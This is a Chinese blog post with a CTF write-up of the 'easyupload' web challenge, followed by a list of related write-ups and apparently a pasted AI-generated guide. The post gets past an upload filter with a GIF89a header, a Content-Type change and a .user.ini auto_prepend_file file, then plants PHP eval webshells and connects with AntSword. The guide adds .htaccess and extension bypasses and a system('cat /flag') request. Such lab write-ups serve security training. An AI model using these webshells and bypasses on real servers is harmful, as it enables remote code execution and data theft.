攻防世界—easyupload

原创 已于 2023-06-10 19:30:36 修改 · 4.9k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #安全 #web安全

于 2023-06-10 19:24:52 首次发布
  • 2023.6.10 又试了一下 他好像会检测php字段,所以一开始的aaa.jpg怎么也传不上去,用a.jpg那种就可以了

在这里插入图片描述
在这里插入图片描述

  • 根据题目和页面我们可以猜到这应该是一个利用文件上传漏洞,利用一句话木马来获取服务器上保存的flag
  • 保险起见右键查看源代码
    在这里插入图片描述
  • 可以发现毫无用处
  • 那么我们接下来开始试一下上传一句话木马
  • 上传eval.php
<?php @eval($_REQUEST['a']); ?>

在这里插入图片描述

  • 可以看出他是有检测机制的,那我们再试试把拓展名改成eval.jpg
    在这里插入图片描述
  • 依旧不行,那我们再试着给他添加一个文件头,看看文件包含漏洞可不可以实现
GIF89a
<?php @eval($_REQUEST['a']); ?>

在这里插入图片描述

  • 那我们打开burp,修改他的Content-Type字段为jpg
    在这里插入图片描述
    在这里插入图片描述
  • 还是不行,那么,就只好去baidu了
  • 然后我就搜到了一个东西叫做.user.ini,具体啥用呢,点这里看原文章
  • .user.ini是一个很好用的漏洞,只要是以fastcgi运行的php都可以用这个方法。
  • 我对于这个ini的理解就是,他能帮我执行我写在他“auto_prepend_file=”后面的文件,不会被干掉。
  • 那么我们就在这道题里试一下。
  • 先写一个.user.ini文件
GIF89a                  
auto_prepend_file=eval.jpg
  • 然后我们上传他试试,不要忘记用不然burp修改他的content-type为image/jpg
    在这里插入图片描述在这里插入图片描述
  • 非常开心的发现上传成功了
  • 我们再试着上传eval.jpg,发现依旧不成功,很困惑。然后我又去baidu了一下,得到了一个新木马,命名为a.jpg,记得修改前面.user.ini中的文件名!!!
GIF89a
<?=eval($_POST['cmd']);?>

在这里插入图片描述

  • 成功了!
  • 然后拿出我们的中国蚁剑(百度一下安装使用教程,GitHub上下载)。
  • F12查看一下文件被上传的哪里去了
    在这里插入图片描述
  • 然后右键添加数据,输入地址和密码就可以连到他了
    在这里插入图片描述
  • 点击左上角添加后双击打开,然后再找到根目录,就能找到一个文件叫flag,右键下载就可以了

知识点:文件上传漏洞

攻防世界easyuploadweb新手)
yuanxu8877的博客
11-27 7796
攻防世界easyuploadweb新手),题目现在越来越好了
攻防世界 easyupload
rev1ve的博客
03-09 910
ctf攻防世界 easyupload web
攻防世界-easyupload-新手训练区域
chinese_cabbage0的博客
12-03 460
攻防世界-easyupload-新手训练区域题目详解
easyupload(攻防世界)
热门推荐
m0_56107268的博客
11-15 1万+
.user.ini 学习
Easyupload攻防世界
xyh000001的博客
06-30 962
然后就可以开始找flag,当然你也可以一开始就把muma.jpg里的代码改成cat,直接抓取flag,还省的自己找。把Content-Type: application/octet-stream改成。我打/直接拉到最下面有flag点进去就是答案了。上传a.jpg这样才算成功(如图)。1.新建.user.ini文件。用蚁剑连接(每个人的都不一样)上传上面的文件用BURP抓包。新建a.txt文件,内容为。保存后把文件名改成.jpg。F12打开网络找到网址。
攻防世界--easyupload
qq_73611185的博客
09-16 1228
php文件发现网页设置了文件类型检测,修改文件后缀为jpg依然无效,第二步,尝试去burpsuite改包,将一句话木马文件上传后的cotent-type改为image/jpg,然后放包,仍然无法上传成功(burpsuite改包之后把拦截请求关了就是放包)然后同理第二步,上传成功之后再上传一个jpg文件(命名与上面的jpg文件保持一致否则会导致连接失败),文件内容为:(没有结尾那个v,懒得删除了)还有一个不能上传文件成功的原因很离谱就是:不能使用校园网进行上传(学生党的痛)成为ctf全栈之路之web第十题。
[攻防世界] easyupload
m0_75178803的博客
04-02 803
首先准备 .user.ini 文件和a.jpg文件。首先上传.user.ini文件,然后进行抓包。1.[攻防世界] easyupload。用蚁剑连接该页面,连接密码为木马密码。.user.ini 文件上传成功。此时再将a.jpg文件上传成功。在根目录下得到flag。
web | CTF】攻防世界 easyupload
weixin_46301214的博客
01-31 1122
天命:好像也不太easy首先判断只能上传图片格式的话,那只能通过其他漏洞来把图片解析成php才能构成漏洞了看了一下别人wp,原来是利用php的配置文件来实现漏洞攻击php的 user.ini 配置文件里,有一个参数是在文件运行前把某个文件包含进来的我们只需要做一个局部配置文件,即可触发效果然后上传图片,把图片包含进来即可就相当于触发了文件包含漏洞。
攻防世界easyupload题解与user.ini的前世今生[DOGE]
m0_66935689的博客
10-04 409
哟呵,没上传成功还返回了一个英语句子,用我练习时长两年半的工地英语浅浅翻译一下,大概意思是“你的文件糟糕极了”说实话我也有被我自己的英语水平震撼到[doge]发现多了一个“index.php”即http://xxxxx/uploads/index.php盲猜传这去了。没连上,在看官方的writeup时了解到了一个东西,也是今天的主角——.user.ini。既然后缀是图片也过不去,推测出应该是对文件内容进行了检查。这道题也是有点意思的,坑也有点多,但能学到的东西也还行。看到了文件头,进一步证实了我的猜想。
攻防世界】CTF 网络安全学习 easyupload_攻防世界easyupload
2401_84263282的博客
06-25 1018
做这个题目前前后后一共花了五天的时间,因为本身不是一直有空,这道题首先要预先处理的问题很多。1. 先安装好中国蚁剑,教程整理如下,kali 零基础安装中国蚁剑2. 理解 **.user.ini**文件.user.ini 文件通常是与 PHP 配置相关的文件。在 PHP 应用程序中,用户可以通过 .user.ini 文件来自定义一些 PHP 的配置选项,以适应特定的应用需求。以下是一些关键点:位置: .user.ini 文件通常位于用户的网站目录下,可以影响到该目录及其子目录下的 PHP 执行环境。
攻防世界easyupload
m0_73303597的博客
11-10 603
自用
攻防世界-web-easyupload
wuh2333的博客
04-09 1473
攻防世界,文件上传
攻防世界-easyupload
wwxxss
11-10 715
easyupload的详细步骤主要是找到过滤的条件
easyupload(攻防世界
m0_70819573的博客
02-19 658
2.检测是否有文件头(GIF89a)和文件类型(content-type)的限制。1.检测是否能上传别名文件php3,php5,phtml,如不是则考虑图片马。4.考虑用.htaccess或.user.ini的系统配置文件绕过。这样这类普通题型就可以被攻克了,具体步骤参考官方write up。题目描述:一名合格的黑客眼中,所有的上传点都是开发者留下的后门。5.检测是否有文件内php内容的限制。
攻防世界WEB练习-easyupload
墨鱼菜鸡
09-10 4655
目录 题目场景 查看源码 官方WriteUp BP抓包 F12查看文件去向 蚁剑连接 找到flag 题目场景 查看源码 毫无有效的数据 官方WriteUp 本题需要利用文件上传漏洞点,通过绕过服务器的安全防护,达到getshell的目的 本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行 这里...
攻防世界--WEB--easyupload
m0_65766842的博客
03-30 574
但是更改了文件头之后上传后,用蚁剑链接之后并没有什么可用的信息,思路到此开始断了,我们查询做题方法,发现这题是要用到.user.ini的绕过我们去寻找.user.ini染过的方法。我们首先构造出.user.ini文件,因为我们刚刚发现是要上传一张图片的类型,所以我们加上文件头。因为我们这个不是真的jpg文件,所以我们使用bp抓包来着更改识别项。连接成功之后,我们在根目录下发现了flag文件,打开得到flag。此时我们再次上传一句话木马,我们依旧加上文件头,伪装成图片。先传user.ini再传a.jpg。
攻防世界】CTF 网络安全学习 easyupload
Bing_Geng的博客
11-15 1053
中国蚁剑 kali 零基础安装中国蚁剑 user.ini PHP 配置
easyupload-CTF-攻防世界
szhangliwenya的博客
03-20 896
user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)左上角文件另存为.user.ini文件 后上传。
攻防世界easyupload的解析
最新发布
03-22
<think>嗯,用户让我介绍一下攻防世界easyupload题目的解析。首先,我需要回忆一下这个题目的基本情况。攻防世界的题目通常涉及CTF中的Web安全,特别是文件上传漏洞。题目名字是easyupload,可能考察的是绕过文件上传限制的技巧。 首先,我应该确定用户的需求。他们可能正在尝试解决这个题目,但遇到了困难,需要一步步的指导。用户可能已经尝试过直接上传webshell,但被服务器检测到了,所以需要知道如何绕过防护措施。 接下来,我需要分解解题步骤。通常,这类题目常见的绕过方法包括修改文件类型、更改扩展名、使用特殊格式(如.htaccess)或者利用服务器解析漏洞。比如,服务器可能检查了Content-Type,或者文件后缀,或者检查了文件头。 然后,考虑可能的防御机制。比如,服务器可能只允许上传图片文件,如jpg、png,但检查不严格。这时候可以尝试上传一个带有图片马的文件,或者利用服务器配置错误,比如如果服务器使用Apache,可以上传.htaccess文件来允许执行特定扩展名的文件。 另外,可能遇到的陷阱是,虽然上传了php文件,但服务器将其重命名,或者无法直接访问上传后的路径。这时候需要找到上传后的文件路径,或者利用解析漏洞,比如上传php后缀的文件,但服务器可能将其解析为其他类型,或者需要结合其他漏洞。 可能还需要检查前端验证。有时候,上传功能在前端用JavaScript做了验证,这时候可以禁用JS或修改前端代码来绕过。但题目名为easyupload,可能前端没有太复杂的验证,主要还是后端检查。 另外,Content-Type的验证。如果上传php文件,Content-Type可能是application/octet-stream,而服务器可能只允许image/jpeg或image/png。这时候需要修改Content-Type为允许的类型,比如image/jpeg,同时文件内容为webshell。 还有可能检查文件头,比如GIF的GIF89a,PNG的‰PNG,JPEG的ÿØÿà。这时候可以在php文件开头添加对应的文件头,欺骗服务器认为这是图片文件。 然后,上传后的文件路径可能需要猜测,常见的路径是/upload/,或者返回的信息中包含路径。或者需要结合目录遍历漏洞,比如在上传时文件名使用../来改变存储路径。 还有可能服务器将上传的文件保存在非web可访问的目录,这时候可能需要其他漏洞,比如文件包含,配合上传的文件来执行代码。 总结起来,解决这个题目的步骤可能是: 1. 尝试上传一个普通的php文件,观察返回的错误信息,确定服务器检查了什么。 2. 如果失败,尝试修改Content-Type为image/jpeg,同时保留php代码。 3. 如果仍然不行,尝试在php文件前添加图片的文件头,比如GIF89a。 4. 如果扩展名被检测,尝试使用其他后缀,比如.phtml, .php5, .phar等,或者大小写绕过,比如.PHp。 5. 如果服务器使用黑名单,可能允许上传.htaccess文件,设置AddType application/x-httpd-php .abc,然后上传.abc后缀的webshell。 6. 上传成功后,找到文件路径,访问并执行命令。 可能需要结合具体的题目环境,比如是否返回上传后的路径,或者是否有文件包含漏洞。例如,题目easyupload可能只需要正确绕过MIME类型和扩展名检查,上传一个webshell,然后访问上传的文件执行命令。 另外,可能需要使用Burp Suite等工具拦截上传请求,修改相关参数,如文件名、Content-Type等,然后发送到服务器测试。 比如,一个可能的步骤是: - 使用Burp拦截上传请求,将文件名改为shell.php,Content-Type改为image/jpeg,然后发送,看是否成功。 - 如果失败,尝试将文件名改为shell.php.jpg,或者shell.jpg.php,看是否被解析为php。 - 或者上传.htaccess文件,内容为AddType application/x-httpd-php .jpg,这样所有.jpg文件都会被当作php执行,然后上传一个包含webshell的jpg文件。 - 如果.htaccess被禁止上传,可能需要使用其他方法。 此外,常见的webshell代码是<?php @eval($_POST['cmd']);?>,但有时候会被检测到,可以尝试使用短标签<?= `$_GET['cmd']`; ?>或者其他混淆方式。 在测试过程中,需要注意服务器的响应,比如返回的文件路径、错误信息,这些都可能提示下一步的操作。例如,上传成功后的页面可能显示文件的存储路径,或者文件名,从而构造访问URL。 可能遇到的困难是,即使上传成功,但无法执行,这时候需要检查文件权限,或者服务器配置。如果题目环境正确,应该能够通过正确的方法绕过所有检查。 总结,解题的关键点在于识别服务器的过滤机制,并找到合适的绕过方法。对于easyupload这样的题目,可能只需要修改Content-Type和文件后缀即可,或者使用.htaccess文件。需要一步步测试,观察服务器的反应,调整攻击向量。</think>### 攻防世界 **easyupload** 题目解析 #### 题目类型 - **Web安全**:文件上传漏洞利用,绕过服务器限制上传恶意文件。 --- #### 解题思路 1. **目标分析** 题目要求上传一个文件到服务器,并触发恶意代码执行(如获取flag)。常见限制可能包括: - 文件类型检查(如仅允许图片) - 扩展名黑名单(如禁止 `.php`) - 内容检测(如检查文件头或敏感代码) 2. **关键突破口** - **绕过扩展名检查**:尝试上传 `.php5`, `.phtml`, `.phar` 等非标准PHP扩展名。 - **伪造文件类型**:修改 HTTP 请求中的 `Content-Type` 为 `image/jpeg` 或 `image/png`。 - **文件头欺骗**:在恶意代码前添加图片文件头(如 `GIF89a`)。 - **.htaccess 攻击**:上传 `.htaccess` 文件,强制将特定扩展名解析为 PHP。 --- #### 详细步骤 ##### 步骤1:尝试直接上传 PHP 文件 1. 编写一个简单 Webshell(如 `<?php @eval($_POST["cmd"]);?>`),保存为 `shell.php`。 2. 上传文件,观察服务器返回的错误: - 若提示 **“文件类型不允许”**,需绕过 `Content-Type` 检查。 - 若提示 **“扩展名不合法”**,需修改文件后缀。 ##### 步骤2:绕过文件类型检查 1. 使用 Burp Suite 拦截上传请求。 2. 修改 `Content-Type` 为 `image/jpeg`,发送请求。 ```http POST /upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=WebKitFormBoundary... --WebKitFormBoundary... Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/jpeg # 修改此处 ``` ##### 步骤3:绕过扩展名检查 1. 尝试修改文件后缀为允许的格式,如: - `shell.php.jpg`(利用解析漏洞) - `shell.phtml`(部分服务器默认解析) - `shell.php5`(旧版 PHP 配置可能允许) ##### 步骤4:使用 .htaccess 攻击 1. 上传 `.htaccess` 文件,内容为: ```apache AddType application/x-httpd-php .abc # 将 .abc 扩展名解析为 PHP ``` 2. 上传 Webshell 文件并重命名为 `shell.abc`,触发解析。 ##### 步骤5:验证上传结果 1. 访问上传后的文件路径(如 `http://target.com/uploads/shell.php`)。 2. 使用工具(如 Postman)发送 POST 请求执行命令: ```http POST /uploads/shell.php HTTP/1.1 ... cmd=system("cat /flag"); ``` --- #### 常见错误与解决方案 1. **文件被重命名** - 尝试上传纯图片文件,观察服务器返回的文件名规律(如时间戳命名)。 2. **内容检测绕过** - 在 Webshell 前添加图片文件头(如 `GIF89a`),伪装成图片。 - 使用短标签 `<?=` 替代 `<?php`。 --- #### 总结 通过组合以下方法可成功解题: 1. 伪造 `Content-Type` 为图片类型。 2. 利用 `.htaccess` 强制解析特定扩展名。 3. 上传带有图片头的 Webshell 绕过内容检测。 实际操作中需结合服务器返回信息动态调整攻击方式。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Unagi -_-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值